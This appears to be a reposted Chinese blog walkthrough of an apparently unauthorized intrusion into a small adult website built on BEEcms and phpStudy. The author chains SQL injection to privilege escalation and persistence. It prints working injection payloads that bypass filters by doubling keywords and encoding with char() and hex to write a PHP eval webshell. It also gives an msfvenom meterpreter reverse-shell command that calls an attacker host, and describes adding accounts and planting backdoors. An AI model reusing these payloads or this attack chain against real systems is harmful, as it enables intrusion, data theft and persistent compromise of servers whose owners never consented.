服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

记一次小黄站渗透过程,实操!!

日期: 来源:Hack分享吧收集编辑:点击关注 

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。


0x01 前言

记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。

0x02 渗透过程

1. 无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索beecms这个cms,发现有通用漏洞。

2. 这里运气比较好,没有更改后台地址,还是默认地址/admin/login.php


3. 通过通用漏洞发先后台管理处存在sql注入漏洞,直接输入admin’,然后就会报错,这里用万能密码不能登陆,看来还是得通过上面得通用漏洞来进行注入


4. 可以看到输入payload后,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过


5. 发现这个注入点后,就有各种各样的注入方式了,通过sql语句写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看看那种方法可以


方法一

1. 通过post抓包sqlmap一把梭,dump出管理员账号密码,进后台找上传点
2. 一把梭,发现并没有,使用脚本也没有绕过

方法二

1. 通过burp抓包,写入一句话,发现写入失败,前面讲到有防护,这里通过hex编码或者char函数绕过。

payload:
admin%27 un union ion selselectect 1,2,3,4,<?php @eval($_POST[123]);?> into outfile 'xm.php'#

2. 对shell部分进行编码


3. 写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x,看到可以写入成功。


ps:这里的写入路径纯属盲猜,运气好,默认目录


4. 用蚁剑连接,成功连接,至此getshell完毕,下来就是后渗透阶段,后面会讲


char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串,payload为:

admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

一样成功写入


1. 写入成功后,菜刀可以连接,我们访问写入的文件,惊奇的发现竟然有admin,和一串md5码,大胆猜测可能是后台账号和密码,试一下


2. md5解密,wocao,成功登陆,然后就是后台找上传了


0x03 后渗透

通过whoami查看权限,发现是admin权限,但是不是最高权限,我们要提到最高权限去


方法一

1. 通过msf生成木马提权
payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe


2.通过蚁剑上传木马,并执行。执行之前打开msf使用模块use exploit/multi/handler,设置相应参数,然后开始监听


3. 不知道什么问题,用这个没有成功,那么只能通过大马提权了


方法二

1. 上传大马,此处应该有狗或者盾之类的,用的免杀,成功上传

2. 访问大马


3. 这里提权方式很多,就不细说了,有大马之后很多操作都可以引刃而解了,开放端口,添加账号,留后门。。等等

4. 创建admin权限账号之后,登陆服务器


0x04 一些其他的发现

通过扫描目录,还发现有phpmyadmin,可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell


0x05 总结

1. 前台sql注入获取用户名密码,进入后台找上传

2. SQL注入语句写入一句话
3. phpmyadmin一句话getshell
4. 上传大马提权

文章来源:CSDN博客(Deilty)原文地址:https://blog.csdn.net/qq_42111373/article/details/105667190




关注公众号回复“1208”可以领取个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。


往期推荐工具

渗透测试常用的数据库综合利用工具

RequestTemplate红队内网渗透工具

Railgun - 一款GUI界面的渗透工具

GoBypass - Golang免杀生成工具

ByPassBehinder冰蝎WebShell免杀工具

SweetBabyScan内网资产探测漏扫工具

掩日 - 适用于红队的综合免杀工具

AuxTools浮鱼渗透辅助工具箱V1.0

POCbomber红队快速打点漏洞检测工具

相关阅读

  • 女老板婚姻大战:那个贪婪小秘书两面通吃

  • 怀孕3个月的女人李晓丽蹊跷殒命水库车内。警方在调查中发现,她与老板蒋真真的丈夫陈光楠关系不简单。更令人意想不到的,还在后面——01zhiyin水库沉车,一尸两命牵出疑案2020年4
  • 连夜通报!发现30例

  • 昨晚中国疾控中心发布全国新型冠状病毒感染疫情最新情况自2022年12月1日至2023年3月2日共发现本土重点关注变异株30例去年12月1日至今年3月2日,全国共报送20551例本土病例新
  • 末日生存狂:我们不只关心丧尸、战争和世界末日

  • 4月25日傍晚,家住海淀区的老韩接到社区电话,他被大数据追踪为一位新冠感染者的密接,需要集中隔离,救护车已经在路上。隔离至少三周,隔离点条件未知,从接到通知到出发不过半小时,老
  • 如何找回你的聊天记录

  • 在我们工作和生活中。在聊天信息中可能会存在很重要的信息。但是由于时间比较长,或者手机上的记录已删除。该怎样找回记录呢?注意!本文涉及到的技术仅供学习。没有任何的不良引
  • 渗透测试不可错过的五个Burp Suite开源插件

  • Burp Suite是安全专家和爱好者中最受欢迎的渗透测试工具之一。以下介绍的五个Burp Suite开源插件能让你的Burp Suite如虎添翼:一、Auth AnalyzerAuth Analyzer可帮你查找授权
  • 牛X!API水平越权漏洞检测工具

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。概述通过替换认证信息后重
  • 很行呀,把全校学生信息都搞出来了!

  • 大家好,我是「徐公」,6 年大厂程序员经验。今天给大家伙分享一个网络安全的案例,程序员和网安同学都可以看看,作者lyc,点击文末「阅读原文」可以看原贴前言:「本文中涉及到的相关
  • RedTeam资料收集整理

  • 转自:渗透云笔记整理了一些红队的资料,和一些脑图,可以看下GitHub;https://github.com/jeansgit/RedTeam【*】一些红队的文章https://github.com/yeyintminthuhtut/Awesome-Red-

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 记一次小黄站渗透过程,实操!!

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。0x01 前言记录某一次无意